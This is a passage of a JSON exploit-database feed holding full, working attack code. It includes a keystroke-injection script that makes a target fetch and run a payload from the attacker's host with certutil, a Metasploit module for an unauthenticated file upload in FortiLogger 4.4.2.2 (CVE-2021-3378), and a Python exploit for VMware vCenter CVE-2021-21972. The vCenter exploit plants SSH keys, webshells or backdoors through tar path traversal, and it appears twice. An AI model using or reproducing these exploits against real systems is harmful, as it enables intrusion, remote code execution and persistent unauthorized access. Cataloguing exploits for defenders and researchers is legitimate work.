\"0a\").decode(\"hex\"),(rhost,port)) # Sends Character hex with packet padding\r\n\t\tsleep(0.03)\r\n\r\ndef SendReturn():\r\n\ttarget.sendto(\"6b657920203352544e\".decode(\"hex\"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app\r\n\tsleep(0.5)\r\n\r\ndef exploit():\r\n\tprint(\"[+] 
3..2..1..\")\r\n\tsleep(2)\r\n\topenCMD()\r\n\tprint(\"[+] *Super fast hacker typing*\")\r\n\tsleep(1)\r\n\tSendString(\"certutil.exe -urlcache -f http://\" + lhost + \"/\" + payload + \" C:\\\\Windows\\\\Temp\\\\\" + payload)\r\n\tSendReturn()\r\n\tprint(\"[+] Retrieving payload\")\r\n\tsleep(3)\r\n\tSendString(\"C:\\\\Windows\\\\Temp\\\\\" + payload)\r\n\tSendReturn()\r\n\tprint(\"[+] Done! Check Your Listener?\")\r\n\r\n\r\ndef main():\r\n\ttarget.connect((rhost,port))\r\n\texploit()\r\n\ttarget.close()\r\n\texit()\r\n\r\nif __name__==\"__main__\":\r\n\tmain()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49601"}, {"lastseen": "2021-03-01T10:39:58", "description": "", "published": "2021-03-01T00:00:00", "type": "exploitdb", "title": "FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3378"], "modified": "2021-03-01T00:00:00", "id": "EDB-ID:49600", "href": "https://www.exploit-db.com/exploits/49600", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::EXE\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'FortiLogger Arbitrary File Upload Exploit',\r\n 'Description' => %q{\r\n This module exploits an unauthenticated arbitrary file upload\r\n via insecure POST request. 
It has been tested on version 4.4.2.2 in\r\n Windows 10 Enterprise.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2021-3378'],\r\n ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']\r\n ],\r\n\r\n 'Platform' => ['win'],\r\n 'Privileged' => false,\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' =>\r\n [\r\n [\r\n 'FortiLogger - 4.4.2.2',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ],\r\n 'DisclosureDate' => '2021-02-26',\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(5000),\r\n OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/'])\r\n ], self.class\r\n )\r\n end\r\n\r\n def check_product_info\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),\r\n 'method' => 'POST',\r\n 'data' => '',\r\n 'headers' => {\r\n 'Accept' => 'application/json, text/javascript, */*; q=0.01',\r\n 'Accept-Language' => 'en-US,en;q=0.5',\r\n 'Accept-Encoding' => 'gzip, deflate',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n }\r\n )\r\n\r\n return res\r\n end\r\n\r\n def check\r\n begin\r\n res = check_product_info\r\n if res && res.code == 200\r\n if JSON.parse(res.body)['Version'] == '4.4.2.2'\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n end\r\n end\r\n\r\n def create_payload\r\n Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s\r\n end\r\n\r\n def exploit\r\n begin\r\n print_good('Generate Payload !')\r\n data = create_payload\r\n\r\n boundary = \"----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}\"\r\n post_data = \"--#{boundary}\\r\\n\"\r\n post_data << \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"b3r.asp\\\"\\r\\n\"\r\n post_data << \"Content-Type: image/png\\r\\n\"\r\n post_data << \"\\r\\n#{data}\\r\\n\"\r\n post_data << 
\"--#{boundary}\\r\\n\"\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),\r\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\r\n 'data' => post_data,\r\n 'headers' => {\r\n 'Accept' => 'application/json',\r\n 'Accept-Language' => 'en-US,en;q=0.5',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n }\r\n )\r\n if res && res.code == 200\r\n if JSON.parse(res.body)['Message'] == 'Error in saving file'\r\n print_error('Error for upload payload..')\r\n else\r\n print_good('Payload has been uploaded !')\r\n\r\n handler\r\n\r\n print_status('Executing payload...')\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),\r\n 'method' => 'GET'\r\n }, 5)\r\n end\r\n end\r\n end\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/49600"}, {"lastseen": "2021-03-01T10:39:58", "description": "", "published": "2021-03-01T00:00:00", "type": "exploitdb", "title": "VMware vCenter Server 7.0 - Unauthenticated File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "EDB-ID:49602", "href": "https://www.exploit-db.com/exploits/49602", "sourceData": "# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload\r\n# Date: 2021-02-27\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)\r\n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds\r\n# CVE: CVE-2021-21972\r\n\r\n#!/usr/bin/env python3\r\n'''\r\n Copyright 2021 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n 
the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-21972.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n CVE-2021-21972 is an unauthenticated file upload and overwrite,\r\n exploitation can be done via SSH public key upload or a webshell\r\n The webshell must be of type JSP, and its success depends heavily on the specific vCenter version\r\n \r\n # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister\r\n # A white page means vulnerable\r\n # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)\r\n # Notes:\r\n # * On Linux SSH key upload is always best, when SSH access is possible & enabled\r\n # * On Linux the upload is done as user vsphere-ui:users\r\n # * On Windows the upload is done as system user\r\n # * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\"\r\n # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Features: vulnerability checker + exploit\r\n'''\r\n\r\nimport os, tarfile, sys, optparse, requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nlProxy = {}\r\nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" 
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <env:Body>\r\n <RetrieveServiceContent xmlns=\"urn:vim25\">\r\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\r\n </RetrieveServiceContent>\r\n </env:Body>\r\n </env:Envelope>'''\r\nsURL = sFile = sRpath = sType = None\r\n\r\ndef parseArguments(options):\r\n global sURL, sFile, sType, sRpath, lProxy\r\n if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')\r\n sURL = options.url\r\n if sURL[-1:] == '/': sURL = sURL[:-1]\r\n if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL\r\n sFile = options.file\r\n if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)\r\n sType = 'ssh'\r\n if options.type: sType = options.type\r\n if options.rpath: sRpath = options.rpath\r\n else: sRpath = None\r\n if options.proxy: lProxy = {'https': options.proxy}\r\n\r\ndef getVersion(sURL):\r\n def getValue(sResponse, sTag = 'vendor'):\r\n try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]\r\n except: pass\r\n return ''\r\n oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)\r\n #print(oResponse.text)\r\n if oResponse.status_code == 200:\r\n sResult = oResponse.text\r\n if not 'VMware' in getValue(sResult, 'vendor'):\r\n exit('[-] Not a VMware system: ' + sURL)\r\n else:\r\n sName = getValue(sResult, 'name')\r\n sVersion = getValue(sResult, 'version') # e.g. 7.0.0\r\n sBuild = getValue(sResult, 'build') # e.g. 
15934073\r\n sFull = getValue(sResult, 'fullName')\r\n print('[+] Identified: ' + sFull)\r\n return sVersion, sBuild\r\n exit('[-] Not a VMware system: ' + sURL)\r\n\r\ndef verify(sURL):\r\n #return True\r\n sURL += '/ui/vropspluginui/rest/services/uploadova'\r\n try:\r\n oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)\r\n except:\r\n exit('[-] System not available: ' + sURL)\r\n if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely\r\n else: return False\r\n\r\ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):\r\n def getResourcePath():\r\n oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)\r\n return oResponse.text.split('static/')[1].split('/')[0]\r\n oTar = tarfile.open('payloadLin.tar','w')\r\n if sRpath: ## version & build not important\r\n if sRpath[0] == '/': sRpath = sRpath[1:]\r\n sPayloadPath = '../../' + sRpath\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'absolute'\r\n elif sType.lower() == 'ssh': ## version & build not important\r\n sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'ssh'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):\r\n ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)\r\n print('[!] 
Selected uploadpath: ' + sPayloadPath[5:])\r\n for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)\r\n oTar.close()\r\n return 'webshell'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):\r\n ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):\r\n ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n \r\n\r\ndef createTarWin(sFile, sRpath = None):\r\n ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows\r\n if sRpath:\r\n if sRpath[0] == '/': sRpath = sRpath[:1]\r\n sPayloadPath = '../../' + sRpath\r\n else:\r\n sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)\r\n oTar = tarfile.open('payloadWin.tar','w')\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n\r\ndef uploadFile(sURL, sUploadType, sFile):\r\n #print('[!] 
Uploading ' + sFile)\r\n sFile = os.path.basename(sFile)\r\n sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'\r\n arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}\r\n ## Linux\r\n oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Linux payload uploaded succesfully.')\r\n if sUploadType == 'ssh':\r\n print('[+] SSH key installed for user \\'vsphere-ui\\'.')\r\n print(' Please run \\'ssh vsphere-ui@' + sURL.replace('https://','') + '\\'')\r\n return True\r\n elif sUploadType == 'webshell':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n #print('testing ' + sWebshell)\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n elif sUploadType == 'backdoor':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n print('[+] Backdoor ready, please reboot or wait for a reboot')\r\n print(' then open: ' + sWebshell)\r\n else: ## absolute\r\n pass\r\n ## Windows\r\n arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}\r\n oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Windows payload uploaded succesfully.')\r\n if sUploadType == 'backdoor':\r\n print('[+] Absolute upload looks OK')\r\n return True\r\n else:\r\n sWebshell = sURL + '/statsreport/' + sFile\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n usage = (\r\n 'Usage: %prog [option]\\n'\r\n 'Exploiting Windows & Linux vCenter 
Server\\n'\r\n 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n'\r\n 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n'\r\n 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')\r\n parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')\r\n parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')\r\n parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n parseArguments(options)\r\n \r\n ## Verify\r\n if verify(sURL): print('[+] Target vulnerable: ' + sURL)\r\n else: exit('[-] Target not vulnerable: ' + sURL)\r\n \r\n ## Read out the version\r\n sVersion, sBuild = getVersion(sURL)\r\n if sRpath: print('[!] Ready to upload your file to ' + sRpath)\r\n elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'')\r\n else: print('[!] Ready to upload webshell \\'' + sFile + '\\'')\r\n sAns = input('[?] Want to exploit? 
[y/N]: ')\r\n if not sAns or not sAns[0].lower() == 'y': exit()\r\n \r\n ## Create TAR file\r\n sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)\r\n if not sUploadType == 'ssh': createTarWin(sFile, sRpath)\r\n\r\n ## Upload and verify\r\n uploadFile(sURL, sUploadType, sFile)\r\n \r\n ## Cleanup\r\n os.remove('payloadLin.tar')\r\n os.remove('payloadWin.tar')", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49602"}], "packetstorm": [{"lastseen": "2021-03-01T16:09:17", "description": "", "published": "2021-03-01T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 7.0 Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "PACKETSTORM:161590", "href": "https://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html", "sourceData": "`# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload \n# Date: 2021-02-27 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html \n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) \n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds \n# CVE: CVE-2021-21972 \n \n#!/usr/bin/env python3 \n''' \nCopyright 2021 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. 
\n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-21972.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nCVE-2021-21972 is an unauthenticated file upload and overwrite, \nexploitation can be done via SSH public key upload or a webshell \nThe webshell must be of type JSP, and its success depends heavily on the specific vCenter version \n \n# Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister \n# A white page means vulnerable \n# A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) \n# Notes: \n# * On Linux SSH key upload is always best, when SSH access is possible & enabled \n# * On Linux the upload is done as user vsphere-ui:users \n# * On Windows the upload is done as system user \n# * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\" \n# * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload \n \nThis is a native implementation without requirements, written in Python 3. 
\nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: vulnerability checker + exploit \n''' \n \nimport os, tarfile, sys, optparse, requests \nrequests.packages.urllib3.disable_warnings() \n \nlProxy = {} \nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> \n<env:Body> \n<RetrieveServiceContent xmlns=\"urn:vim25\"> \n<_this type=\"ServiceInstance\">ServiceInstance</_this> \n</RetrieveServiceContent> \n</env:Body> \n</env:Envelope>''' \nsURL = sFile = sRpath = sType = None \n \ndef parseArguments(options): \nglobal sURL, sFile, sType, sRpath, lProxy \nif not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') \nsURL = options.url \nif sURL[-1:] == '/': sURL = sURL[:-1] \nif not sURL[:4].lower() == 'http': sURL = 'https://' + sURL \nsFile = options.file \nif not os.path.exists(sFile): exit('[-] File not found: ' + sFile) \nsType = 'ssh' \nif options.type: sType = options.type \nif options.rpath: sRpath = options.rpath \nelse: sRpath = None \nif options.proxy: lProxy = {'https': options.proxy} \n \ndef getVersion(sURL): \ndef getValue(sResponse, sTag = 'vendor'): \ntry: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] \nexcept: pass \nreturn '' \noResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) \n#print(oResponse.text) \nif oResponse.status_code == 200: \nsResult = oResponse.text \nif not 'VMware' in getValue(sResult, 'vendor'): \nexit('[-] Not a VMware system: ' + sURL) \nelse: \nsName = getValue(sResult, 'name') \nsVersion = getValue(sResult, 'version') # e.g. 7.0.0 \nsBuild = getValue(sResult, 'build') # e.g. 
15934073 \nsFull = getValue(sResult, 'fullName') \nprint('[+] Identified: ' + sFull) \nreturn sVersion, sBuild \nexit('[-] Not a VMware system: ' + sURL) \n \ndef verify(sURL): \n#return True \nsURL += '/ui/vropspluginui/rest/services/uploadova' \ntry: \noResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) \nexcept: \nexit('[-] System not available: ' + sURL) \nif oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely \nelse: return False \n \ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): \ndef getResourcePath(): \noResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) \nreturn oResponse.text.split('static/')[1].split('/')[0] \noTar = tarfile.open('payloadLin.tar','w') \nif sRpath: ## version & build not important \nif sRpath[0] == '/': sRpath = sRpath[1:] \nsPayloadPath = '../../' + sRpath \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'absolute' \nelif sType.lower() == 'ssh': ## version & build not important \nsPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'ssh' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): \n## vCenter 6.5/6.7 < 13010631, just this location with a subnumber \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) \nprint('[!] 
Selected uploadpath: ' + sPayloadPath[5:]) \nfor i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) \noTar.close() \nreturn 'webshell' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): \n## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile> \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \nelse: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): \n## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>) \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \n \n \ndef createTarWin(sFile, sRpath = None): \n## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows \nif sRpath: \nif sRpath[0] == '/': sRpath = sRpath[:1] \nsPayloadPath = '../../' + sRpath \nelse: \nsPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) \noTar = tarfile.open('payloadWin.tar','w') \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \n \ndef uploadFile(sURL, sUploadType, sFile): \n#print('[!] 
Uploading ' + sFile) \nsFile = os.path.basename(sFile) \nsUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' \narrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} \n## Linux \noResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Linux payload uploaded succesfully.') \nif sUploadType == 'ssh': \nprint('[+] SSH key installed for user \\'vsphere-ui\\'.') \nprint(' Please run \\'ssh vsphere-ui@' + sURL.replace('https://','') + '\\'') \nreturn True \nelif sUploadType == 'webshell': \nsWebshell = sURL + '/ui/resources/' + sFile \n#print('testing ' + sWebshell) \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nelif sUploadType == 'backdoor': \nsWebshell = sURL + '/ui/resources/' + sFile \nprint('[+] Backdoor ready, please reboot or wait for a reboot') \nprint(' then open: ' + sWebshell) \nelse: ## absolute \npass \n## Windows \narrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} \noResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Windows payload uploaded succesfully.') \nif sUploadType == 'backdoor': \nprint('[+] Absolute upload looks OK') \nreturn True \nelse: \nsWebshell = sURL + '/statsreport/' + sFile \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nreturn False \n \nif __name__ == \"__main__\": \nusage = ( \n'Usage: %prog [option]\\n' \n'Exploiting Windows & Linux vCenter Server\\n' \n'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n' \n'Note1: Since 
the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n' \n'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') \nparser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') \nparser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') \nparser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') \n \n(options, args) = parser.parse_args() \n \nparseArguments(options) \n \n## Verify \nif verify(sURL): print('[+] Target vulnerable: ' + sURL) \nelse: exit('[-] Target not vulnerable: ' + sURL) \n \n## Read out the version \nsVersion, sBuild = getVersion(sURL) \nif sRpath: print('[!] Ready to upload your file to ' + sRpath) \nelif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'') \nelse: print('[!] Ready to upload webshell \\'' + sFile + '\\'') \nsAns = input('[?] Want to exploit? 
[y/N]: ') \nif not sAns or not sAns[0].lower() == 'y': exit() \n \n## Create TAR file \nsUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) \nif not sUploadType == 'ssh': createTarWin(sFile, sRpath) \n \n## Upload and verify \nuploadFile(sURL, sUploadType, sFile) \n \n## Cleanup \nos.remove('payloadLin.tar') \nos.remove('payloadWin.tar') \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161590/vmwarevcenterserver70-upload.txt"}, {"lastseen": "2021-03-01T16:10:20", "description": "", "published": "2021-03-01T00:00:00", "type": "packetstorm", "title": "FortiLogger 4.4.2.2 Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3378"], "modified": "2021-03-01T00:00:00", "id": "PACKETSTORM:161601", "href": "https://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::EXE \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'FortiLogger Arbitrary File Upload Exploit', \n'Description' => %q{ \nThis module exploits an unauthenticated arbitrary file upload \nvia insecure POST request. It has been tested on version 4.4.2.2 in \nWindows 10 Enterprise. 
